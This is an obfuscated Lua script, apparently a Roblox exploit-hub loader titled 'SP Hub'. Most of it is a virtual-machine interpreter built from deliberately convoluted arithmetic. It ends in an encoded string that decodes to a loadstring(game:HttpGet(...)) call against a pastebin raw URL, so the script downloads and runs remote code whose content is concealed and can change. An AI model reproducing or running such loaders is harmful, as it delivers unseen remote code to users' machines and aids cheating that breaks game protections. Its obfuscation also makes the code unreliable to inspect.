--[[ 
   _____ _____    _    _       _     
  / ____|  __ \  | |  | |     | |    
 | (___ | |__) | | |__| |_   _| |__  
  \___ \|  ___/  |  __  | | | | '_ \ 
  ____) | |      | |  | | |_| | |_) |
 |_____/|_|      |_|  |_|\__,_|_.__/ 
                                     
                                     
--]]

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v79=0;while true do if (v79==0) then v19=v0(v3(v30,1,1));return "";end end else local v80=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v80,v19);v19=nil;v90=1;end end else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/((5 -3)^(v32-((1 + 1) -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((1497 -(282 + 595)) -(555 + 64)))) + 1)) ;return v81-(v81%(932 -((2494 -(1523 + 114)) + 74))) ;else local v82=(570 -(330 + 37 + (286 -85)))^(v32-(928 -(214 + 713))) ;return (((v31%(v82 + v82))>=v82) and 1) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1066 -(68 + (1842 -845)))) then return (v37 * (469 -213)) + v36 ;end if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (8 -6) ;v35=118 -((382 -(87 + 263)) + 85) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + ((1135 -(802 + 150)) -(67 + 113)) );v18=v18 + 3 + 1 ;return (v41 * (41190819 -(65729677 -41316074))) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,(1 -0) + 0 ,20) * ((440 -(145 + 293))^(1029 -(915 + 82)))) + v42 ;local v46=v20(v43,59 -38 ,19 + 12 );local v47=((v20(v43,41 -9 )==(1188 -(1069 + 118))) and  -(2 -1)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==((430 -(44 + 386)) -0)) then return v47 * (0 + (1486 -(998 + 488))) ;else local v92=791 -(368 + 423) ;while true do if (v92==(0 -0)) then v46=1;v44=18 -(10 + 8) ;break;end end end elseif (v46==2047) then return ((v45==((0 + 0) -(0 + 0))) and (v47 * ((443 -(416 + 26))/0))) or (v47 * NaN) ;end return v8(v47,v46-((4038 -(201 + 571)) -2243) ) * (v44 + (v45/((1 + 1)^52))) ;end local function v25(v48) local v49=0 -0 ;local v50;local v51;while true do if (v49==(1139 -(116 + (4838 -3816)))) then v50=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;v49=887 -(261 + 624) ;end if (v49==2) then v51={};for v93=(1 + 0) -0 , #v50 do v51[v93]=v2(v1(v3(v50,v93,v93)));end v49=2 + (3 -2) ;end if (v49==(0 -(1747 -(760 + 987)))) then v50=nil;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=(1916 -(1789 + 124)) -2 ;end if (v49==(862 -(814 + 45))) then return v6(v51);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v52== #":") then local v86=(function() return 0;end)();local v87=(function() return;end)();while true do if (v86==(0 + 0)) then v87=(function() return 0;end)();while true do if (v87==(0 -0)) then v57=(function() return v23();end)();v58=(function() return {};end)();v87=(function() return 1 -0 ;end)();end if (v87==(2 -0)) then v52=(function() return 2;end)();break;end if (v87==(2 -1)) then for v131= #" ",v57 do local v132=(function() return 0;end)();local v133=(function() return;end)();local v134=(function() return;end)();local v135=(function() return;end)();while true do if (v132~=1) then else v135=(function() return nil;end)();while true do if (v133==1) then if (v134== #"|") then v135=(function() return v21()~=0 ;end)();elseif (v134==2) then v135=(function() return v24();end)();elseif (v134== #"xxx") then v135=(function() return v25();end)();end v58[v131]=(function() return v135;end)();break;end if ((285 -(134 + 151))==v133) then local v177=(function() return 1665 -(970 + 695) ;end)();while true do if (v177==0) then v134=(function() return v21();end)();v135=(function() return nil;end)();v177=(function() return 1;end)();end if (v177~=(1 -0)) then else v133=(function() return 1991 -(582 + 1408) ;end)();break;end end end end break;end if (v132~=(0 -0)) then else v133=(function() return 0 -0 ;end)();v134=(function() return nil;end)();v132=(function() return 1;end)();end end end v56[ #"91("]=(function() return v21();end)();v87=(function() return 2;end)();end end break;end end end if (v52~=2) then else for v95= #"|",v23() do local v96=(function() return v21();end)();if (v20(v96, #"]", #"<")~=(0 -0)) then else local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103~=(1826 -(1195 + 629))) then else if (v20(v105, #"[", #"{")~= #"{") then else v106[2]=(function() return v58[v106[2 -0 ]];end)();end if (v20(v105,243 -(187 + 54) ,782 -(162 + 618) )~= #",") then else v106[ #"nil"]=(function() return v58[v106[ #"-19"]];end)();end v103=(function() return 3;end)();end if (v103~=3) then else if (v20(v105, #"xnx", #"asd")== #" ") then v106[ #"http"]=(function() return v58[v106[ #"asd1"]];end)();end v53[v95]=(function() return v106;end)();break;end if (v103~=(1 + 0)) then else local v126=(function() return 0 + 0 ;end)();while true do if (v126==1) then v103=(function() return 2;end)();break;end if (v126~=0) then else v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==(0 -0)) then local v174=(function() return 0;end)();local v175=(function() return;end)();while true do if (v174==(0 + 0)) then v175=(function() return 1636 -(1373 + 263) ;end)();while true do if (v175~=0) then else v106[ #"xnx"]=(function() return v22();end)();v106[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v104== #" ") then v106[ #"gha"]=(function() return v23();end)();elseif (v104==2) then v106[ #"nil"]=(function() return v23() -(2^16) ;end)();elseif (v104== #"xnx") then local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182==0) then v183=(function() return 1000 -(451 + 549) ;end)();while true do if ((0 + 0)==v183) then v106[ #"nil"]=(function() return v23() -((2 -0)^(26 -10)) ;end)();v106[ #"0836"]=(function() return v22();end)();break;end end break;end end end v126=(function() return 1385 -(746 + 638) ;end)();end end end if (v103==0) then local v127=(function() return 0 + 0 ;end)();while true do if (v127~=1) then else v103=(function() return 1 -0 ;end)();break;end if (0==v127) then v104=(function() return v20(v96,343 -(218 + 123) , #"xxx");end)();v105=(function() return v20(v96, #"asd1",1587 -(1535 + 46) );end)();v127=(function() return 1 + 0 ;end)();end end end end end end for v97= #"~",v23() do v54[v97-#"]" ]=(function() return v28();end)();end return v56;end if (v52==0) then local v88=(function() return 0 + 0 ;end)();local v89=(function() return;end)();while true do if (v88==(560 -(306 + 254))) then v89=(function() return 0;end)();while true do if (v89~=2) then else v52=(function() return  #"/";end)();break;end if (v89==(1 + 0)) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v89=(function() return 1469 -(899 + 568) ;end)();end if (v89==(0 + 0)) then v53=(function() return {};end)();v54=(function() return {};end)();v89=(function() return 1;end)();end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[2 -1 ];local v63=v59[128 -((592 -(41 + 435)) + 10) ];local v64=v59[606 -((1269 -(938 + 63)) + 335) ];return function(...) local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=291 -(60 + 230) ;local v70= -(573 -(426 + 146));local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v83=0 + 0 ,v73 do if ((1881>=1293) and (v83>=v67)) then v71[v83-v67 ]=v72[v83 + 1 + 0 ];else v75[v83]=v72[v83 + (1457 -(282 + 1174)) ];end end local v76=(v73-v67) + (812 -(438 + 131 + 242)) ;local v77;local v78;while true do v77=v65[v69];v78=v77[2 -(1126 -(936 + 189)) ];if (v78<=(1 + 2)) then if (v78<=((338 + 687) -(706 + 318))) then if ((2357==2357) and (v78>(1251 -(721 + 530)))) then local v107=v77[1273 -(945 + 326) ];local v108,v109=v68(v75[v107](v13(v75,v107 + (2 -1) ,v77[8 -5 ])));v70=(v109 + v107) -(1 + 0) ;local v110=0 -0 ;for v128=v107,v70 do v110=v110 + (701 -(271 + 429)) ;v75[v128]=v108[v110];end else local v111=0 + 0 ;local v112;local v113;while true do if ((1501 -((3021 -(1565 + 48)) + 92))==v111) then v75[v112 + (1087 -(461 + 625)) ]=v113;v75[v112]=v113[v77[1292 -(993 + 295) ]];break;end if (v111==(0 + 0)) then v112=v77[1173 -(418 + 753) ];v113=v75[v77[2 + 1 ]];v111=1 + 0 ;end end end elseif (v78==(1 + 1)) then v75[v77[2 + 0 ]]();else v75[v77[2]]=v61[v77[1 + 2 ]];end elseif (v78<=(13 -8)) then if (v78>(2 + 2)) then do return;end else local v116=0 + 0 + 0 ;local v117;local v118;local v119;local v120;local v121;while true do if ((123==123) and (v116==((1162 -(782 + 356)) -19))) then v69=v69 + (530 -(406 + 123)) ;v77=v65[v69];v121=v77[1 + 1 ];v118,v119=v68(v75[v121](v13(v75,v121 + ((2037 -(176 + 91)) -(1749 + 20)) ,v77[3])));v116=5 + 1 ;end if (v116==(2 + (15 -9))) then v77=v65[v69];v75[v77[2]]();v69=v69 + (2 -1) ;v77=v65[v69];v116=1331 -(1249 + 73) ;end if (v116==(2 + 1)) then v77=v65[v69];v121=v77[1147 -(466 + 679) ];v120=v75[v77[1205 -(373 + 829) ]];v75[v121 + (2 -1) ]=v120;v116=11 -7 ;end if (v116==(1907 -(106 + 1794))) then v77=v65[v69];v121=v77[1 + 1 ];v75[v121]=v75[v121](v13(v75,v121 + (1 -0) + 0 ,v70));v69=v69 + (1 -0) ;v116=23 -15 ;end if (v116==(244 -(64 + 174))) then v70=(v119 + v121) -(2 -1) ;v117=114 -(4 + 110) ;for v171=v121,v70 do v117=v117 + (337 -(144 + 192)) ;v75[v171]=v118[v117];end v69=v69 + (585 -(57 + 527)) ;v116=1434 -(41 + 1386) ;end if (v116==(112 -(17 + 86))) then do return;end break;end if ((v116==(2 + 2)) or (1056>=3392)) then v75[v121]=v120[v77[3 + 1 ]];v69=v69 + (1 -0) ;v77=v65[v69];v75[v77[1506 -(363 + (2233 -(975 + 117))) ]]=v77[8 -(1880 -(157 + 1718)) ];v116=171 -(122 + 44) ;end if (v116==(2 -0)) then v69=v69 + ((3 + 0) -2) ;v77=v65[v69];v75[v77[2 + 0 ]]=v61[v77[1 + 2 ]];v69=v69 + ((3 -2) -0) ;v116=68 -(30 + 35) ;end if (v116==((0 -0) + 0)) then v117=nil;v118,v119=nil;v120=nil;v121=nil;v116=(1019 -(697 + 321)) + 0 ;end if ((v116==(1258 -(1043 + (582 -368)))) or (1081<1075)) then v75[v77[7 -5 ]]={};v69=v69 + (1213 -((683 -360) + 889)) ;v77=v65[v69];v75[v77[5 -(6 -3) ]]=v61[v77[583 -(361 + 219) ]];v116=322 -(53 + 267) ;end end end elseif ((v78<=6) or (1049>=4432)) then local v122=(0 + 0) -0 ;local v123;while true do if ((v122==(0 + 0)) or (4768<=846)) then v123=v77[(777 -362) -(15 + 398) ];v75[v123]=v75[v123](v13(v75,v123 + (983 -(18 + 964)) ,v70));break;end end elseif (v78>(26 -19)) then v75[v77[2 + 0 ]]=v77[2 + 1 ];else v75[v77[306 -(244 + 60) ]]={};end v69=v69 + ((2281 -1430) -(20 + 830)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F334855627538506800094Q00047Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
